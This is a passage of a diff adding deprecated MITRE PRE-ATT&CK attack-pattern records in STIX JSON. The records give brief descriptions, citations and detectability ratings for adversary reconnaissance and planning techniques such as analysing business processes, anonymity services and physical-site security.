+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Searching publicly available sources that cannot be monitored by a defender.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Information readily available through searches", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1052", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--fe421ab9-c8f3-42f7-9ae1-5d6c324cc925", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze application security posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1293", + "external_id": "T1293" + }, + { + "source_name": "Li2014ExploitKits", + "description": "Brooks Li. (2014, December 17). What\u2019s New in Exploit Kits in 2014. Retrieved March 6, 2017." + }, + { + "source_name": "RecurlyGHOST", + "description": "Mark Poole. (2015, January 27). 
GHOST vulnerability (CVE-2015-0235) in popular Linux library glibc allows remote code execution. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze technical scanning results to identify weaknesses in the configuration or architecture. Many of the common tools highlight these weakness automatically (e.g., software security scanning tools or published vulnerabilities about commonly used libraries).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1070", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--87775365-2081-4b6e-99bd-48a3b8f36563", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze architecture and configuration posture", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1288).\n\nAn adversary may analyze technical scanning results to identify weaknesses in the configuration or architecture of a victim network. These weaknesses could include architectural flaws, misconfigurations, or improper security controls. 
(Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1288", + "external_id": "T1288" + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many of the common tools highlight these weakness automatically.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1065", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--57619ab3-f6a5-43c8-8dd1-b0b8a986a870", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze business processes", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).\n\nBusiness processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1301", + "external_id": "T1301" + }, + { + "source_name": "Warwick2015", + "description": "Warwick Ashford. (2015, March). Cyber crime: What every business needs to know. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Social engineering and other attempts to learn about business practices and processes would not immediately be associated with an impending cyber event.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "To get any kind of fidelity into business processes would require insider access. Basic processes could be mapped, but understanding where in the organization these processes take place and who to target during any given phase of the process would generally be difficult.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1078", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--773950e1-090c-488b-a480-9ff236312e31", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze data collected", + "description": "This object is deprecated as its content has been merged into the enterprise domain. 
Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1287).\n\nAn adversary will assess collected information such as software/hardware versions, vulnerabilities, patch level, etc. They will analyze technical scanning results to identify weaknesses in the confirmation or architecture. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper) (Citation: RSA-APTRecon) (Citation: FireEyeAPT28)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1287", + "external_id": "T1287" + }, + { + "source_name": "SurveyDetectionStrategies", + "description": "Jamal Raiyn. (2014). A survey of Cyber Attack Detection Strategies. Retrieved March 5, 2017." + }, + { + "source_name": "CyberReconPaper", + "description": "H. P. Sanghvi and M. S. Dahiya. (2013, February). Cyber Reconnaissance: An Alarm before Cyber Attack. Retrieved March 5, 2017." + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + }, + { + "source_name": "FireEyeAPT28", + "description": "FireEye, Inc. (2014). APT 28: A Window into Russia\u2019s Cyber Espionage Operations?. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Many of the common tools highlight these weaknesses automatically. 
Adversary can \"dry run\" against the target using known exploits or burner devices to determine key identifiers of software, hardware, and services.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1064", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a1e8d61b-22e1-4983-8485-96420152ecd8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze hardware/software security defensive capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1294).\n\nAn adversary can probe a victim's network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1294", + "external_id": "T1294" + }, + { + "source_name": "OSFingerprinting2014", + "description": "InfoSec Institute. (2014, June 19). What You Must Know About OS Fingerprinting. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze network traffic to determine security filtering policies, packets dropped, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1071", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7baccb84-356c-4e89-8c5d-58e701f033fc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1300).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1300", + "external_id": "T1300" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1077", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--092f05e3-f7c0-4cd2-91be-3a8d6ed3cadc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1289).\n\nAnalyze strengths and weaknesses of the target for potential areas of where to focus compromise efforts. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1289", + "external_id": "T1289" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This can be done offline after the data has been collected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings and hiring requisitions have to be made public for contractors and many times have the name of the organization being supported. In addition, they outline the skills needed to do a particular job, which can provide insight into the technical structure and organization of a target.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1066", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--96eb59d1-6c46-44bb-bfcd-56be02a00d41", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze organizational skillsets and deficiencies", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1297).\n\nUnderstanding organizational skillsets and deficiencies could provide insight in to weakness in defenses, or opportunities for exploitation. (Citation: FakeLinkedIn)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1297", + "external_id": "T1297" + }, + { + "source_name": "FakeLinkedIn", + "description": "LIFARS. (2015, October 8). Hackers Fake LinkedIn Profiles to Scout Targets. 
Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "No access to who is consuming the job postings to know what is being observed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Job postings have to be made public for contractors and many times have the name of the organization being supported.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1074", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--34450117-d1d5-417c-bb74-4359fc6551ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze presence of outsourced capabilities", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).\n\nOutsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. 
(Citation: Scasny2015) (Citation: OPM Breach)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1303", + "external_id": "T1303" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + }, + { + "source_name": "OPM Breach", + "description": "Hon. Jason Chaffetz, Hon. Mark Meadows, Hon. Will Hurd. (2016, September 7). The OPM Data Breach: How the Government Jeopardized Our National Security for More than a Generation. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Much of this analysis can be done using the target's open source website, which is purposely designed to be informational and may not have extensive visitor tracking capabilities.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Analyzing business relationships from information gathering may provide insight into outsourced capabilities. 
In certain industries, outsourced capabilities or close business partnerships may be advertised on corporate websites.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1080", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ee40d054-6e83-4302-88dc-a3af98821d8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Analyze social and business relationships, interests, and affiliations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1295).\n\nSocial media provides insight into the target's affiliations with groups and organizations. Certification information can explain their technical associations and professional associations. Personal information can provide data for exploitation or even blackmail. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1295", + "external_id": "T1295" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public sources are external to the defender's organization. 
Some social media sites have an option to show you when users are looking at your profile, but an adversary can evade this tracking depending on how they conduct the searches.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Social and business relationship information for an individual can be found by examining their social media contacts (e.g., [https://www.facebook.com Facebook] and [https://www.linkedin.com LinkedIn]). Social media also provides insight into the target's affiliations with groups and organizations. Finally, certification information can explain their technical associations and professional associations.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1072", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d3dca536-8bf0-4e43-97c1-44a2353c3d69", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Anonymity services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1306).\n\nAnonymity services reduce the amount of information available that can be used to track an adversary's activities. Multiple options are available to hide activity, limit tracking, and increase anonymity. 
(Citation: TOR Design) (Citation: Stratfor2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1306", + "external_id": "T1306" + }, + { + "source_name": "TOR Design", + "description": "Roger Dingledine, Nick Mathewson, Paul Syverson. (2004, August). Tor: The Second-Generation Onion Router. Retrieved March 28, 2017." + }, + { + "source_name": "Stratfor2012", + "description": "Sean Gallagher. (2012, March 6). Inside the hacking of Stratfor: the FBI\u2019s case against Antisec member Anarchaos. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Depends on service. Some are easy to detect, but are hard to trace (e.g., [https://torproject.org TOR]).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Easy access to anonymizers, quasi-anonymous services like remailers, [https://torproject.org TOR], relays, burner phones, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1083", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--ae85ba2f-27ea-42d9-b42a-0fe89ee19ed5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess KITs/KIQs benefits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1229).\n\nKey Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1229", + "external_id": "T1229" + }, + { + "source_name": "CompetitiveIntelligence", + "description": "Matt H. Evans. (n.d.). Course 12: Competitive Intelligence (Part 2 of 2). Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. 
May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1006", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--8e927b19-04a6-4aaa-a42f-4f0a53411d27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess current holdings, needs, and wants", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1236).\n\nAnalysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1236", + "external_id": "T1236" + }, + { + "source_name": "CyberAdvertisingChar", + "description": "Tom Parker, Matt Devost, Marcus Sachs, and Toby Miller. (2003). Cyber Adversary Characterization. Retrieved March 5, 2017." + }, + { + "source_name": "CIATradecraft", + "description": "Central Intelligence Agency. (2009). A Tradecraft Primer: Structured Analytic Techniques for Improving Intelligence Analysis. Retrieved March 5, 2017." + }, + { + "source_name": "ForensicAdversaryModeling", + "description": "John Lowry, Rico Valdez, Brad Wood. (n.d.). Adversary Modeling to Develop Forensic Observables. Retrieved March 5, 2017." 
+ }, + { + "source_name": "CyberAdversaryBehavior", + "description": "Elizabeth Van Ruitenbeek, Ken Keefe, William H. Sanders, and Carol Muehrcke. (2010). Characterizing the Behavior of Cyber Adversaries: The Means, Motive, and Opportunity of Cyberattacks. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1013", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--d3999268-740f-467e-a075-c82e2d04be62", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess leadership areas of interest", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1224).\n\nLeadership assesses the areas of most interest to them and generates Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ). For example, an adversary knows from open and closed source reporting that cyber is of interest, resulting in it being a KIT. 
(Citation: ODNIIntegration)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1224", + "external_id": "T1224" + }, + { + "source_name": "ODNIIntegration", + "description": "Office of the Director of National Intelligence. (n.d.). Intelligence Integration - Who Are We. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1001", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e2aa077d-60c9-4de5-b015-a9c382877cd9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess opportunities created by business deals", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1299).\n\nDuring mergers, divestitures, or other period of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests, or other non standard practices may not be as noticeable. 
(Citation: RossiMergers) (Citation: MeidlHealthMergers)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1299", + "external_id": "T1299" + }, + { + "source_name": "RossiMergers", + "description": "Ben Rossi. (2014, August 29). Mergers and acquisitions: a new target for cyber attack. Retrieved March 6, 2017." + }, + { + "source_name": "MeidlHealthMergers", + "description": "Holly Meidl. (2015, December 16). How Health Care Companies Can Reduce the Risk of Cyber-Attack During Mergers and Acquisitions. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Most of this activity would target partners and business processes. Partners would not report. Difficult to tie this activity to a cyber attack.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Mapping joint infrastructure and business processes is difficult without insider knowledge or SIGINT capability. 
While a merger creates and opportunity to exploit potentially cumbersome or sloppy business processes, advance notice of a merger is difficult; merger information is typically close-hold until the deal is done.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1076", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--31a57c70-6709-4d06-a473-c3df1f74c1d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assess security posture of physical locations", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1302).\n\nPhysical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1302", + "external_id": "T1302" + }, + { + "source_name": "CyberPhysicalAssessment", + "description": "Doug MacDonald, Samuel L Clements, Scott W Patrick, Casey Perkins, George Muller, Mary J Lancaster, Will Hutton. (2013, February). Cyber/physical security vulnerability assessment integration. Retrieved March 6, 2017." + }, + { + "source_name": "CriticalInfrastructureAssessment", + "description": "J. Depoy, J. Phelan, P. Sholander, B. Smith, G.B. Varnado and G. Wyss. (2015). RISK ASSESSMENT for PHYSICAL AND CYBER ATTACKS on CRITICAL INFRASTRUCTURES. Retrieved March 6, 2017." 
